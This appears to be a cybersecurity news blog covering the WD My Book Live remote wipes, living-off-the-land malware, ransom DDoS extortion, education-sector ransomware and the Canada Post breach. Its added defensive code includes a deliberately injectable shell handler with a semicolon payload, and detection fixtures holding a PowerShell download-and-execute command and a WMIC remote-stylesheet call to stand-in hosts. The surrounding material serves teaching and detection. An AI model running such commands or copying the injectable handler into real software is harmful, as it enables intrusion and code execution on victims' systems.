Western Digital (WD) Hard Drives Remotely Wiped Clean Worldwide
Users worldwide of Western Digital (WD) My Book Live and My Book Live Duo network-attached storage devices found their drives wiped clean remotely on June 23, 2021.
On June 24, 2021, a WD user named “sunpeak” started a thread on the WD Community forum stating that all the data on his WD My Book Live device was gone. “Previously the 2T volume was almost full but now it shows full capacity,” sunpeak said.
Hundreds of other WD My Book Live and My Book Live Duo owners echoed sunpeak, reporting that their devices had been wiped remotely as well.
“It is very scary that someone can do factory restore the drive without any permission granted from the end user,” sunpeak said. The thread starter said he found the following entries in user.log on the affected device:
Jun 23 15:14:05 MyBookLive factoryRestore.sh: begin script:
Jun 23 15:14:05 MyBookLive shutdown: shutting down for system reboot
Jun 23 16:02:26 MyBookLive S15mountDataVolume.sh: begin script: start
Jun 23 16:02:29 MyBookLive _: pkg: wd-nas
Jun 23 16:02:30 MyBookLive _: pkg: networking-general
Jun 23 16:02:30 MyBookLive _: pkg: apache-php-webdav
Jun 23 16:02:31 MyBookLive _: pkg: date-time
Jun 23 16:02:31 MyBookLive _: pkg: alerts
Jun 23 16:02:31 MyBookLive logger: hostname=MyBookLive
Jun 23 16:02:32 MyBookLive _: pkg: admin-rest-api
Another WD user added this message to the thread: “All my data is gone too. Message in GUI says it was ‘Factory reset’ today! 06/23. I am totally screwed without that data … years of it.”
Western Digital Statement
On June 25, 2021, US-based Western Digital recommended that users disconnect their My Book Live and My Book Live Duo devices from the internet to protect the data on them. Both models were introduced in 2010 and received their final firmware update in 2015.
“Western Digital has determined that some My Book Live devices are being compromised by malicious software,” Western Digital said. “In some cases, this compromise has led to a factory reset that appears to erase all data on the device.”
According to Western Digital, the log files that they’ve reviewed show that the attackers directly connected to the affected My Book Live and My Book Live Duo devices from a variety of IP addresses in different countries. The company said this shows that the affected devices were directly accessible from the internet, via direct connection or port forwarding that was enabled either manually or automatically via UPnP.
“Western Digital has determined that some My Book Live and My Book Live Duo devices are being compromised through exploitation of a remote command execution vulnerability,” Western Digital said.
The remote command execution vulnerability Western Digital referred to is CVE-2018-18472: all versions of the WD My Book Live and My Book Live Duo firmware have a root remote command execution bug via shell metacharacters in the language parameter of the /api/1.0/rest/language_configuration endpoint. It can be triggered by anyone who can reach the device’s IP address, and a proof of concept for exploiting CVE-2018-18472 is publicly available.
The last firmware update for these devices shipped in 2015, three years before CVE-2018-18472 was reported, so the vulnerability was never patched: the devices were already out of support when it was found.
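To make the class of bug concrete, here is an added example (not Western Digital’s firmware code, and not the public proof of concept) of a hypothetical REST handler that splices a request parameter into a shell command, beside a hardened version. The handler names, the locale format and the use of echo as a stand-in for the real command are assumptions for illustration:

```python
import re
import subprocess

# Added, hypothetical handler: this is NOT Western Digital's firmware code.
# It reproduces the class of bug behind CVE-2018-18472: a request parameter
# is spliced into a shell command string, so shell metacharacters in the
# parameter become extra commands run as the web server's user.

# Assumed locale format, e.g. en_US or de_DE; a strict allowlist is the fix.
LANGUAGE_RE = re.compile(r"[a-z]{2}_[A-Z]{2}")


def vulnerable_language_configuration(language: str) -> str:
    """Concatenates the parameter into a command and runs it through /bin/sh.

    'echo' stands in for whatever the real device did with the value; the
    injection works the same way for a destructive command.
    """
    cmd = "echo configure-language " + language
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def accepts(language: str) -> bool:
    """Allowlist check: the whole value must be a locale code, nothing else."""
    return LANGUAGE_RE.fullmatch(language) is not None


def hardened_language_configuration(language: str) -> str:
    """Validates the value and never hands it to a shell."""
    if not accepts(language):
        raise ValueError(f"rejected language value: {language!r}")
    # argv list form: the value is one argument; no shell parses it.
    result = subprocess.run(
        ["echo", "configure-language", language],
        capture_output=True,
        text=True,
    )
    return result.stdout


def injected(output: str, marker: str = "INJECTED") -> bool:
    """True if the attacker's appended command produced its own output line."""
    return any(line.strip() == marker for line in output.splitlines())


if __name__ == "__main__":
    # Constructed payload: ';' terminates the intended command, then a second
    # command runs. A real attacker would put a factory reset there.
    payload = "en_US; echo INJECTED"
    out = vulnerable_language_configuration(payload)
    print(out, end="")
    print("vulnerable handler executed injected command:", injected(out))
    print(hardened_language_configuration("en_US"), end="")
    try:
        hardened_language_configuration(payload)
    except ValueError as exc:
        print("hardened handler:", exc)
```

The two fixes are independent and both matter: the allowlist rejects anything that is not a locale code, and the argv form means that even a value that slipped past validation would be a single argument rather than shell syntax.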
Other Cyberattacks Affecting Hard Drives/Backups
WD My Book Live and My Book Live Duo devices are network-attached storage (NAS) devices: hard drives that connect to a network rather than directly to one computer. Other examples of NAS devices are those made by the Taiwanese corporation QNAP Systems, Inc.
In the past few years, QNAP NAS devices have been the target of malicious actors. In 2019, researchers at Intezer detected the malicious software known as QNAPCrypt.
"QNAP is a well-known vendor for selling NAS servers, which the malware was intended to infect and encrypt the containing files for ransom,” researchers at Intezer said. “NAS servers normally store large amounts of important data and files, which make them a valuable target for attackers and especially a viable target for ransomware campaigns.”
In 2014, researchers at FireEye observed attackers attempting to exploit the Bash remote code injection vulnerability known as Shellshock (CVE-2014-6271) against QNAP NAS devices.
"These attacks result in the hackers having a root level remote shell, gaining full access to the contents of the NAS,” FireEye researchers said. “NAS systems are used by enterprises to store large volumes of files and house databases, as well as by consumers for personal storage. This makes NAS an attractive target for attackers given the broad types of data they handle. In this case, the attackers can gain full access the NAS contents as well as execute other commands.”
Cybersecurity Best Practices
The loss of years of data on WD My Book Live and My Book Live Duo devices is a lesson for every user of network-attached storage.
Network-attached storage (NAS) devices, including WD My Book Live and My Book Live Duo devices and QNAP devices, have become targets of attackers because of the wealth of data they hold.
It is important to practice the time-honored 3-2-1 backup rule: keep 3 copies of critical data (the production copy and 2 backups), on 2 different kinds of media, with 1 copy kept offsite, and offline, for disaster recovery. A single NAS that is also the only backup, as many My Book Live owners discovered, is not a backup.
Living off the land has become standard practice in today’s cyberattacks that aim to evade security solutions.
The living off the land attack takes its name from the “living off the land” way of life, that is, living by eating only the food that one produces from the land.
In the cybersecurity context, a living off the land attack uses legitimate programs and processes that are already present on the victim’s systems to perform nefarious activities. Living off the land enables attackers to blend into victims’ networks and hide among legitimate programs and processes to carry out a stealthy attack. Traditional security solutions often miss living off the land attacks because the activity comes from legitimate, often signed, programs and processes.
Astaroth: Example of a Malware that Lives Off the Land
Astaroth is an example of malware that completely lived off the land to avoid detection. Astaroth is an info-stealing malware that abuses various legitimate Windows processes in an attempt to run undetected on Windows computers.
In the blog post "Latest Astaroth living-off-the-land attacks are even more invisible but not less observable," the Microsoft Defender Security Research Team said it started seeing the updated Astaroth attack chain in late 2019. In mid-2019, the team had observed an unusual spike in activity related to Windows Management Instrumentation Command-line (WMIC), prompting it to investigate; the spike turned out to be part of the Astaroth attack chain.
WMIC provides a command-line interface for Windows Management Instrumentation (WMI) – referring to the infrastructure for management data and operations on Windows operating systems.
The Microsoft Defender Security Research Team said that after the WMIC abuse was exposed, Astaroth dropped WMIC entirely and introduced new living off the land techniques that make the attack chain even stealthier, such as abusing Alternate Data Streams (ADS) and abusing the legitimate process ExtExport.exe.
Alternate Data Streams (ADS) are an NTFS feature that lets a file carry additional named data streams besides its main content; these extra streams are not shown by default in Explorer or a plain dir listing, which makes them a convenient place to stash a payload. ExtExport.exe is a legitimate, signed binary that ships with Internet Explorer and, when pointed at a directory, loads DLLs with specific expected names from it. The Microsoft Defender Security Research Team said that Astaroth uses ExtExport.exe to load its malicious payload, while ADS is used to hide payloads on disk.
Other Examples of Living Off the Land Attacks
In the report “The Active Adversary Playbook 2021,” Sophos found that PowerShell and PsExec are among the top 3 legitimate tools used by cyberattackers in 2020 and early 2021. PowerShell and PsExec are legitimate Windows operating system tools used by system administrators.
PowerShell is an interactive command-line interface and scripting environment included in the Windows operating system, while PsExec is a Windows tool that can be used to execute a program on another computer. Microsoft said, “PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems.”
According to Mitre, PowerShell commands and scripts have been known to execute malicious payloads, create new tasks on remote machines, identify configuration settings, evade defenses, exfiltrate data, pull Active Directory information from the target environment, issue interactive commands over a network connection, and access credential data.
Mitre reported that PsExec has been abused to download or upload a file over a network share, write programs to the ADMIN$ network share to execute commands on remote systems, and execute binaries on remote systems using a temporary Windows service.
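As an added example that is not from Sophos, MITRE or Microsoft, the following Python runs a few detection rules over constructed process-creation records (Sysmon Event ID 1 style fields) covering the abuses described above: WMIC fetching a remote XSL stylesheet through /format:, PowerShell with an encoded command, commands spawned by PsExec’s service side, and ExtExport.exe being launched. The field names, paths and sample events are constructed for illustration:

```python
import base64
import re
from dataclasses import dataclass
from typing import List

# Constructed process-creation records, in the shape of Sysmon Event ID 1 /
# Windows Security 4688 fields. These are not logs from any real incident.


@dataclass(frozen=True)
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str


@dataclass(frozen=True)
class Finding:
    technique: str
    detail: str
    event: ProcessEvent


# Longest alias first so "-encodedcommand" is not cut short as "-e".
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")
# WMIC /format: pointing at a URL fetches a remote XSL stylesheet and runs the
# script embedded in it (the trick Astaroth's earlier chain used).
FORMAT_URL_RE = re.compile(r'(?i)/format:"?(https?://[^\s"]+)')


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(b64: str) -> str:
    """PowerShell -EncodedCommand is base64 over UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def analyze(event: ProcessEvent) -> List[Finding]:
    findings: List[Finding] = []
    image = basename(event.image)
    parent = basename(event.parent_image)
    cl = event.command_line

    if image == "wmic.exe":
        m = FORMAT_URL_RE.search(cl)
        if m:
            findings.append(Finding("wmic remote XSL via /format", m.group(1), event))

    if image in ("powershell.exe", "pwsh.exe"):
        m = ENCODED_RE.search(cl)
        if m:
            try:
                detail = decode_encoded_command(m.group(1))
            except (ValueError, UnicodeDecodeError):
                detail = "<undecodable payload>"
            findings.append(Finding("powershell encoded command", detail, event))

    if image in ("psexec.exe", "psexec64.exe") or parent == "psexesvc.exe":
        # PsExec's remote side runs as the PSEXESVC service; its children are
        # the commands an operator (or attacker) launched on this host.
        findings.append(Finding("psexec remote execution", cl, event))

    if image == "extexport.exe":
        # Legitimate IE binary that loads DLLs from the directory it is given.
        findings.append(Finding("extexport.exe DLL side-load", cl, event))

    return findings


def analyze_all(events) -> List[Finding]:
    return [f for e in events for f in analyze(e)]


# Sample encoded command, built here so the base64 is exact.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe",
                 'wmic os get /format:"https://example.invalid/payload.xsl"',
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 f"powershell.exe -nop -w hidden -EncodedCommand {SAMPLE_ENC}",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "cmd /c whoami",
                 r"C:\Windows\PSEXESVC.exe"),
    ProcessEvent(r"C:\Program Files\Internet Explorer\ExtExport.exe",
                 r"ExtExport.exe C:\Users\Public\ibm", r"C:\Windows\System32\cmd.exe"),
    # Benign: an administrator's scheduled script, nothing encoded or remote.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\scripts\backup.ps1", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for f in analyze_all(SAMPLE_EVENTS):
        print(f"[{f.technique}] {basename(f.event.image)}: {f.detail}")
```

The rules key on how the legitimate tool is invoked and by whom, not on the tool itself, which is the only way to separate an administrator’s PowerShell from an attacker’s; decoding the encoded command before alerting is what gives the analyst something to act on.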
Windows legitimate features aren’t the only programs abused by attackers in living off the land attacks. Third-party programs are also abused by living off the land attackers.
In 2017, the Petya variant known as NotPetya spread worldwide via a tainted update of M.E.Doc, accounting software from a Ukrainian company. In 2020, researchers at Sophos reported that the group behind the ransomware called "RobbinHood" used a signed driver, part of a now-deprecated software package published by Taiwan-based motherboard manufacturer Gigabyte, as the means to load a second, unsigned driver into Windows.
“This second driver then goes to great lengths to kill processes and files belonging to endpoint security products, bypassing tamper protection, to enable the ransomware to attack without interference,” Sophos said.
The SolarWinds attackers likewise rode a trusted, signed update of the SolarWinds Orion software, affecting thousands of SolarWinds customers that downloaded the tainted version.
Cybersecurity Best Practices
Here are some of the cybersecurity best practices in preventing and mitigating the effects of living off the land attacks:
Switch off or remove unneeded programs
Ransom DDoS Extortion On the Rise Again
A recent report from researchers at Proofpoint showed that ransom distributed denial-of-service (DDoS) extortions are on the rise again.
In the blog post “Ransom DDoS Extortion Actor 'Fancy Lazarus' Returns,” researchers at Proofpoint reported that since May 21, 2021, they've observed renewed DDoS extortion activity targeting an increasing number of industries by the threat group known as "Fancy Lazarus." In a DDoS attack, a system (website, network, application server, DNS server, and individual IP) is flooded with data requests in a bid to shut it down.
“The ransom distributed denial of service extortion threat actor known as ‘Fancy Lazarus’ is back, taking aim at an increasing number of industries, including the energy, financial, insurance, manufacturing, public utilities, and retail sectors,” researchers at Proofpoint said. “The actor [Fancy Lazarus] took over a month-long break from April to May 2021 before returning with new campaigns that include some changes to the group’s tactics, techniques, and procedures ….”
According to researchers at Proofpoint, the threat group’s latest campaign changes the group’s name to Fancy Lazarus from previous names such as “Lazarus,” “Lazarus Group,” and “Armada Collective.” The researchers found no connection between this ransom DDoS extortion group and the advanced persistent threat (APT) actors with the same names.
Ransom DDoS Extortion Prevalence
On November 1, 2019, CERT NZ reported that it had received reports of an extortion campaign targeting companies in New Zealand’s financial sector. The campaign, CERT NZ said, involved two phases. The first phase was an email giving the name of the extortionist, the name of the target company, the deadline for the threatened major DDoS attack, and the ransom demanded to prevent it.
The second phase, according to CERT NZ, was a demonstrative DDoS attack (typically lasting about 30 minutes) against an IP address in the company’s network. CERT NZ said the demonstration attacks targeted services using the following protocols:
Hypertext Transfer Protocol (HTTP)
Web Service Dynamic Discovery (WSD)
Apple’s Remote Management Service (ARMS)
Simple Service Discovery Protocol (SSDP)
Network Time Protocol (NTP)
Domain Name System (DNS)
Lightweight Directory Access Protocol (LDAP)
TCP SYN and Internet Control Message Protocol (ICMP) floods
On November 15, 2019, researchers at Akamai said multiple companies have reported receiving an email demanding 2 bitcoins. Akamai said the extortion email contains a threat that if payment isn’t made before the deadline expires, the price increases by 1 bitcoin and the targeted DDoS attack will start.
“Shortly after a customer received one of these extortion emails, Akamai observed a 30Gbps attack (at peak) originating from a globally distributed botnet, where each IP sent a fraction of the overall traffic,” Akamai said. “The attackers were abusing DNS, Apple Remote Management Service (ARMS), CLDAP, TFTP, PortMap, and WS-Discovery (WSD), across the UDP protocol.”
In August 2020, the Federal Bureau of Investigation (FBI) issued an alert warning that thousands of organizations in multiple industries across the globe were targeted in the ransom DDoS extortion campaign similar to the ransom DDoS extortion campaign described by Akamai and CERT NZ. According to the FBI, DDoS "demonstration" launched by the threat group varied across institutions with some targeting a single IP address and others targeting multiple IP addresses, as well as variable peak volumes and attack length.
In the August 2020 blog post "Ransom Demands Return: New DDoS Extortion Threats From Old Actors Targeting Finance and Retail," researchers at Akamai said they’ve observed ransom DDoS attacks peak at almost 200 Gb/sec, utilizing ARMS, DNS Flood, GRE Protocol Flood, SNMP Flood, SYN Flood, and WSDiscovery Flood attacks as their main vectors.
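The protocols in the CERT NZ and Akamai lists share one trait: the flood arrives from the well-known UDP service port of an abused third-party server, not from the attacker’s own addresses. As an added example (not from CERT NZ, Akamai or Proofpoint), the following Python classifies constructed NetFlow-style records aimed at a target by reflection vector and reports bandwidth, reflector count and average packet size for each. The port-to-protocol table is standard; the flow records and the target address are constructed:

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable

# UDP services abused for reflection/amplification, keyed by the well-known
# port the reflector answers FROM. Names follow the CERT NZ and Akamai lists.
REFLECTION_PORTS = {
    53: "DNS",
    69: "TFTP",
    111: "PortMap",
    123: "NTP",
    161: "SNMP",
    389: "CLDAP",
    1900: "SSDP",
    3283: "ARMS",
    3702: "WS-Discovery",
}


@dataclass(frozen=True)
class Flow:
    """One unidirectional flow record (NetFlow/IPFIX-style), constructed."""
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str
    bytes: int
    packets: int


def classify_reflection(flows: Iterable[Flow], target: str, window_seconds: float) -> Dict[str, dict]:
    """Groups inbound UDP traffic to `target` by reflection vector.

    The tell-tale of reflected traffic is that it arrives FROM a service port
    (53, 123, ...) TO arbitrary high ports on the target that never sent a request.
    """
    acc = defaultdict(lambda: {"bytes": 0, "packets": 0, "reflectors": set()})
    for f in flows:
        if f.dst_ip != target or f.proto != "UDP":
            continue
        vector = REFLECTION_PORTS.get(f.src_port)
        if vector is None:
            continue
        s = acc[vector]
        s["bytes"] += f.bytes
        s["packets"] += f.packets
        s["reflectors"].add(f.src_ip)

    total_bits = sum(s["bytes"] for s in acc.values()) * 8
    report = {}
    for vector, s in acc.items():
        report[vector] = {
            "gbps": s["bytes"] * 8 / window_seconds / 1e9,
            "share": s["bytes"] * 8 / total_bits if total_bits else 0.0,
            "reflectors": len(s["reflectors"]),
            "avg_packet_bytes": s["bytes"] // s["packets"],
        }
    return report


def total_gbps(report: Dict[str, dict]) -> float:
    return sum(v["gbps"] for v in report.values())


TARGET = "192.0.2.10"

# Constructed one-second sample: three vectors against TARGET plus noise.
SAMPLE_FLOWS = (
    [Flow(f"198.51.100.{i}", 53, TARGET, 40000 + i, "UDP", 3_000_000, 2_000) for i in range(1, 51)]
    + [Flow(f"203.0.113.{i}", 123, TARGET, 41000 + i, "UDP", 2_400_000, 5_000) for i in range(1, 21)]
    + [Flow(f"198.18.0.{i}", 3283, TARGET, 42000 + i, "UDP", 1_500_000, 1_000) for i in range(1, 11)]
    + [
        Flow("198.51.100.200", 443, TARGET, 50000, "TCP", 120_000, 100),  # ordinary TCP
        Flow("198.51.100.201", 40001, TARGET, 53, "UDP", 1_000, 10),  # a query TO our DNS
        Flow("198.51.100.202", 53, "192.0.2.99", 40002, "UDP", 9_000_000, 6_000),  # other host
    ]
)

if __name__ == "__main__":
    rep = classify_reflection(SAMPLE_FLOWS, TARGET, window_seconds=1.0)
    for vector, v in sorted(rep.items(), key=lambda kv: -kv[1]["gbps"]):
        print(f"{vector:13s} {v['gbps']:6.3f} Gbps  {v['share']:5.1%}  "
              f"{v['reflectors']:4d} reflectors  avg pkt {v['avg_packet_bytes']} B")
    print(f"total {total_gbps(rep):.3f} Gbps")
```

The per-vector breakdown is what an upstream provider or scrubbing service needs to write filters (for example, dropping UDP source port 3283 to the target when no Apple Remote Desktop traffic is expected), and the reflector count distinguishes a distributed reflection attack from a single misbehaving host.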
Teresa Walsh, global head of intelligence at the Financial Services Information Sharing and Analysis Center (FS-ISAC), a cybersecurity consortium of nearly 7,000 financial companies told the Wall Street Journal last February that the global nature of the targets of the ransom DDoS extortion campaign was alarming, citing victims in North America, Latin America, Europe, the Middle East, Africa, and Asia-Pacific.
“After about four or five members raised their hands to say that they were seeing similar activity [ransom DDoS extortion], that’s when we started diving into a potential campaign against our members,” said Walsh. “This accumulated week upon week. Even months later, we were still seeing extortion emails coming through, and short-lived attacks,” Ms. Walsh said.
Ransom DDoS Extortion Campaign Modus Operandi
According to Proofpoint researchers, the ransom DDoS extortion campaign modus operandi always begins with sensational emails. The researchers said the extortion emails contain the following:
It’s important to note that DDoS attacks against websites, networks, application servers, DNS servers, and individual IPs can be absorbed with a DDoS protection service that scrubs traffic upstream of your network, which removes the extortionists’ leverage; paying the ransom does not.
Rise of Ransomware Attacks in the Education Sector
The National Cyber Security Centre (NCSC), an organization of the UK Government that provides cybersecurity guidance and support, recently reported that it has continued to respond to an increased number of ransomware attacks against schools, colleges and universities in the UK.
“As of late May/June 2021, the NCSC is investigating another increase in ransomware attacks against schools, colleges and universities in the UK,” NCSC said. The NCSC previously highlighted an increase in ransomware attacks on the UK education sector during August/September 2020 and again in February 2021.
Ransomware and Its Impact
Ransomware is a type of malicious software (malware) traditionally known for encrypting victims’ files, preventing victims from accessing them. After file encryption, a ransom note is shown on the compromised computer telling the victim to pay a certain amount, typically in cryptocurrency, for the decryption tool that would unlock the encrypted files.
More recently, ransomware operators threaten to release files stolen from the victim’s network if the victim refuses to pay for the decryption tool. Many ransomware operators now employ this double extortion tactic, in which a victim is asked for two ransom payments.
The first payment is for the decryption tool, while the second is for the non-publication of the files stolen from the victim’s network. Ransomware operators maintain “name and shame” websites on the darknet to expose victims who continue to refuse to pay.
“In recent incidents affecting the education sector, ransomware has led to the loss of student coursework, school financial records …,” NCSC said. According to the NCSC, ransomware attacks in the education sector can have a devastating impact on organizations, with victims requiring a significant amount of recovery time to reinstate critical services, and these events can also be high profile in nature, with wide public and media interest.
An attack vector refers to the path or means in which an attacker gains access to an organization’s network to deliver a malware, in this case, a ransomware. According to the NCSC, ransomware attackers can gain access to a victim’s network through remote access systems, phishing emails, and other vulnerable software or hardware.
According to the NCSC, attackers gain access to victims’ networks through remote access systems such as remote desktop protocol (RDP) and virtual private networks (VPN). RDP is a proprietary Microsoft protocol that lets a user connect to and control another computer’s desktop over a network, for example an employee working from home reaching an office desktop or server over the internet.
The shift towards remote learning over the past year as a result of COVID-19 restrictions led many organizations to deploy VPN access, as a VPN is viewed as a secure way of reaching company networks and private resources. In recent years, however, multiple security vulnerabilities have been discovered in RDP and in VPN appliances from Citrix, Fortinet, Pulse Secure and Palo Alto Networks, and an unpatched VPN gateway is itself an entry point.
According to the NCSC, phishing emails are frequently used by attackers to deploy ransomware. An attacker sends a phishing email – disguised as coming from a legitimate sender – to trick the email receiver to click a link or download an attachment, enabling the deployment of the ransomware into the email receiver’s computer.
Other Vulnerable Software or Hardware
According to the NCSC, unpatched or insecure devices have commonly been used by ransomware attackers as an easy route into networks. An example of a software vulnerability exploited by ransomware attackers to install ransomware on a network is the set of ProxyLogon vulnerabilities in on-premises Microsoft Exchange Server disclosed in March 2021.
The NCSC added that ransomware attackers have recently been observed sabotaging backup devices in order to make recovery more difficult, encrypting entire virtual servers, and using scripting environments such as PowerShell to deploy the ransomware quickly across a network.
Cybersecurity Best Practices
Here are some cybersecurity best practices as recommended by the NCSC that can be employed by organizations in the education sector in order to prevent and mitigate the effects of ransomware attacks:
Keep up-to-date and tested offline backups.
As ransomware attackers have been known for sabotaging internet-exposed backup devices in order to make recovery more difficult, it’s important to keep offline backups to recover from a ransomware attack.
Secure remote access systems (RDP and VPN) with strong passwords, multi-factor authentication (MFA), and timely patching.
Implement effective vulnerability management and patching procedures.
Implement the following mechanisms to prevent phishing attacks: make it harder for email from your domains to be spoofed by employing anti-spoofing controls, filter or block incoming phishing emails, train your users, particularly with phishing simulations, and build a culture in which users report phishing attempts.
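The anti-spoofing controls the NCSC refers to are the SPF, DKIM and DMARC DNS records. As an added example that is not NCSC’s code, here is a small Python checker that grades SPF and DMARC records for the weaknesses that leave a domain spoofable (a permissive all mechanism, too many DNS lookups, a monitoring-only DMARC policy). The records below are constructed; a real check would feed in the TXT records returned by DNS for the domain and for its _dmarc subdomain:

```python
from typing import Dict, List

# Added example. These are constructed TXT records, not real DNS lookups, so
# the checks run offline; in practice feed in the output of a DNS query for
# example.com (SPF) and _dmarc.example.com (DMARC).


def evaluate_spf(record: str) -> List[str]:
    """Returns a list of problems with an SPF record (empty list = acceptable)."""
    problems = []
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["not an SPF record (must start with v=spf1)"]

    # Mechanisms that cost a DNS lookup; RFC 7208 allows at most 10 per evaluation.
    lookups = 0
    for term in terms[1:]:
        t = term.lower().lstrip("+-~?")
        if t.startswith(("include:", "exists:", "redirect=", "a:", "mx:", "ptr:")) \
                or t in ("a", "mx", "ptr"):
            lookups += 1
    if lookups > 10:
        problems.append(f"{lookups} DNS-lookup mechanisms; receivers stop evaluating after 10 (permerror)")

    last = terms[-1].lower()
    if last in ("+all", "all"):
        problems.append("'+all' authorises every sender on the internet")
    elif last == "?all":
        problems.append("'?all' is neutral: unauthorised senders are neither passed nor failed")
    elif last == "~all":
        problems.append("'~all' softfail: consider '-all' once all legitimate senders are listed")
    elif last != "-all" and not last.startswith("redirect="):
        problems.append("no terminating 'all' mechanism; unlisted senders default to neutral")
    return problems


def parse_dmarc(record: str) -> Dict[str, str]:
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    return tags


def evaluate_dmarc(record: str) -> List[str]:
    """Returns problems with a DMARC record; an enforcing policy yields an empty list."""
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return ["not a DMARC record (must start with v=DMARC1)"]
    problems = []
    policy = tags.get("p", "").lower()
    if policy == "none":
        problems.append("p=none only monitors; spoofed mail is still delivered")
    elif policy not in ("quarantine", "reject"):
        problems.append("missing or invalid p= policy")
    pct_raw = tags.get("pct", "100")
    pct = int(pct_raw) if pct_raw.isdigit() else 100
    if pct < 100:
        problems.append(f"pct={pct}: policy applied to only {pct}% of failing mail")
    if "rua" not in tags:
        problems.append("no rua= address: you will not see who is spoofing the domain")
    return problems


def assess(spf_record: str, dmarc_record: str) -> Dict[str, List[str]]:
    return {"spf": evaluate_spf(spf_record), "dmarc": evaluate_dmarc(dmarc_record)}


# Constructed records for a hypothetical school domain.
WEAK_SPF = "v=spf1 a mx include:spf1.example.invalid include:spf2.example.invalid ptr +all"
STRONG_SPF = "v=spf1 ip4:192.0.2.0/24 include:_spf.mail.example.invalid -all"
WEAK_DMARC = "v=DMARC1; p=none; pct=50"
STRONG_DMARC = "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.invalid"

if __name__ == "__main__":
    for label, result in (("weak", assess(WEAK_SPF, WEAK_DMARC)),
                          ("strong", assess(STRONG_SPF, STRONG_DMARC))):
        print(label)
        for kind, problems in result.items():
            print(f"  {kind}: {problems or 'ok'}")
```

DKIM is deliberately not graded here, because a DKIM selector record only tells you a key exists; whether outbound mail is actually signed with it has to be checked on a real message. SPF and DMARC, by contrast, can be judged from the records alone, and p=reject with a populated rua address is the state to aim for.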
Canada Post Becomes the Latest Victim of Supply Chain Attack
Canada Post recently announced that it fell victim to a supply chain attack, resulting in a data breach relating to nearly a million receiving customers.
A supply chain attack, also known as a third-party attack, happens when an attacker infiltrates your organization’s system through an outside partner or supplier with access to your organization’s system.
In a press statement released on May 26, 2021, Canada Post said that it was informed on May 19 by one of its suppliers, Commport Communications, that the supplier had suffered a ransomware attack and that the attack had compromised Canada Post customer data.
Commport Communications’ electronic data interchange (EDI) solution is used by Canada Post to manage the shipping manifest data of large parcel business customers. Shipping manifests typically include sender and receiver contact information such as the names and addresses of the business sending the item and the customer receiving it.
“In all, the impacted shipping manifests for the 44 commercial customers contained information relating to just over 950 thousand receiving customers,” Canada Post said.
Canada Post added that the impacted shipping manifests were from July 2016 to March 2019 and that the vast majority (97%) contained the name and address of the receiving customer, while the remainder (3%) contained an email address and/or phone number.
“We are now working closely with Commport Communications and have engaged external cyber security experts to fully investigate and take action,” Canada Post said. “We are proactively informing the impacted business customers and providing the information and support necessary to help them determine their next steps. As well, the Office of the Privacy Commissioner has been notified.”
According to Canada Post, in November 2020, Commport Communications notified Innovapost, Canada Post's IT subsidiary, of a potential ransomware issue. Canada Post said that Commport Communications advised at that time that there was no evidence to suggest any customer data had been compromised.
In December 2020, the group behind the ransomware called “Lorenz” posted on its data leak site that they had breached Commport Communications during a ransomware attack.
Lorenz ransomware is a relatively new actor in the ransomware field. Similar to other ransomware, Lorenz encrypts victims’ files and demands from victims ransom for the decryption tool that would unlock the encrypted files. Michael Gillespie of ID Ransomware told BleepingComputer that the Lorenz ransomware and older ransomware known as “ThunderCrypt” have the same encryptor. It isn’t clear whether Lorenz and ThunderCrypt are operated by the same group or if the newer ransomware purchased the source code of the older ransomware to create its own variant.
Similar to other ransomware, Lorenz ransomware steals victims’ files. And similar to other ransomware groups, the group behind Lorenz ransomware maintains a website in which password-protected archives of stolen files are published.
According to BleepingComputer, the group behind Lorenz ransomware is different from other ransomware groups as this group first sells the stolen data to other threat actors or possible competitors. In case no one buys the stolen data and the victim refuses to pay, the group behind Lorenz ransomware releases the password for the password-protected data leak archive in order to make the stolen data available to anyone who downloads the files.
Another peculiar characteristic of the group behind Lorenz ransomware is that the group also sells access to the victim's internal network along with the data. Access to the victim's internal network, for some threat actors, is more valuable than the data.
“Like other human-operated ransomware attacks, Lorenz will breach a network and spread laterally to other devices until they gain access to Windows domain administrator credentials,” BleepingComputer said. “While spreading throughout the system, they will harvest unencrypted files from victims' servers, which they upload to remote servers under their control.”
Cybersecurity Best Practices
Many human-operated ransomware attacks gain initial access to their victims’ networks by brute-forcing RDP (Remote Desktop Protocol), the Microsoft protocol that lets a user connect to and control another computer’s desktop over a network.
RDP servers exposed to the internet with weak username and password combinations, without multi-factor authentication (MFA), without a VPN in front of them, and without lockout or other protections are easily taken over by brute force, the trial-and-error guessing of a valid username and password combination. Threat actors also use RDP for lateral movement once inside, logging on to other machines with credentials they have already stolen or guessed; RDP does not remove the need for credentials, it just makes stolen ones convenient to use.
RDP servers can be protected from brute force with strong passwords, MFA, a VPN or remote desktop gateway in front of them, and account lockout. Attackers find internet-exposed RDP by scanning for its default port, TCP 3389; moving RDP to a different port cuts the noise from the laziest scanners but does not hide the service, since internet-wide scanners probe all ports and fingerprint the protocol. The reliable fix is not to expose RDP to the internet at all.
